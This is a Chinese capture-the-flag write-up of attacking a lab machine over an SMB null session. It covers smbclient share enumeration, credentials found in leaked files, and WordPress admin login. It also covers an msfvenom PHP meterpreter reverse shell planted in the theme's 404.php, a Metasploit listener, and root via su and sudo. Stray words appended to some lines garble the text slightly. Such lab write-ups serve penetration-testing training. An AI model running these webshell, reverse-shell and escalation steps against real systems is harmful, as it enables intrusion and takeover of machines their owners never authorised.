CTF—攻防练习之SMB私钥泄露

攻击机:192.168.32.152php

靶机 :192.168.32.155python

 

打开靶机mysql

nmap一下web

咱们看到了开放了 ssh,smb,mysql这些端口,还有一个大端口sql

对smb服务咱们能够
1.使用空口令,弱口令尝试,查看敏感文件shell

-- smbclient -L IP
-- smbclient '\\IP\$share'
-- get敏感文件

数据库

2.远程溢出漏洞分析
--searchsploit samba版本号

咱们用smbclient -L 192.168.32.155 列出smb索所分享的全部目录,用空口令恰好能够登陆
bash

发现一个共享设备打印机,一个共享文件还有一个空链接web服务器
咱们查看下这些文件
smbclient '\\192.168.32.155\print$'
smbclient '\\192.168.32.155\share$'
smbclient '\\192.168.32.155\IPC$'服务器


发现目前只有share的文件能够利用ssh

那么就get 下载下来吧

get deets.txt
get robots.txt

发如今deets.txt文件中有串密码12345

在wordpress目录中发现config配置文件信息,下载下来,发现服务器admin和password

那么咱们就尝试用该帐户和密码登陆mysql数据库

不容许远程链接。。那么咱们想办法登陆到远程服务器,ssh也是开放的端口,试试ssh

ssh Admin@192.168.32.155 试下出现的两个密码都不对

试试searchsploit 探索性smb版本有没有可利用的溢出漏洞

nmap -A -v -T4 192.168.32.155 查看端口对应版本号

 searchsploit 。。。 没有发现任何溢出漏洞

 

咱们暂时放弃smb和ssh,用http的端口试试,dirb一下

有关admin打开试试

 

在这里咱们输入刚才的Admin和密码咱们就登进去了!

那么咱们就制做一个webshell木立刻传上去

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 生成一个反弹shell上传php木马

保存下来
再打开metasploit启动监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.32.152
exploit
再打开刚才的网页,找到了一个上传webshell的位置

点击update file

 success!


再打开路径得到反弹shell

http://靶场ip/wordpress/wp-content/thems/twentyfifteen/404.php

启动,会话秒断。。。

最后发现payload设置错了,搞成wiondows了。。。再来一次

python -c "import pty;pty.spawn('/bin/bash')"  优化终端

而后 su root,输密码尝试了刚才找出几个不对,那么再去试试别的用户
cat /etc/passwd 发现home下一个用户togie

 

su togie 密码为找到的12345 sudo su 提权,靶场权限拿下最后根目录下有flag文件

相关文章
相关标签/搜索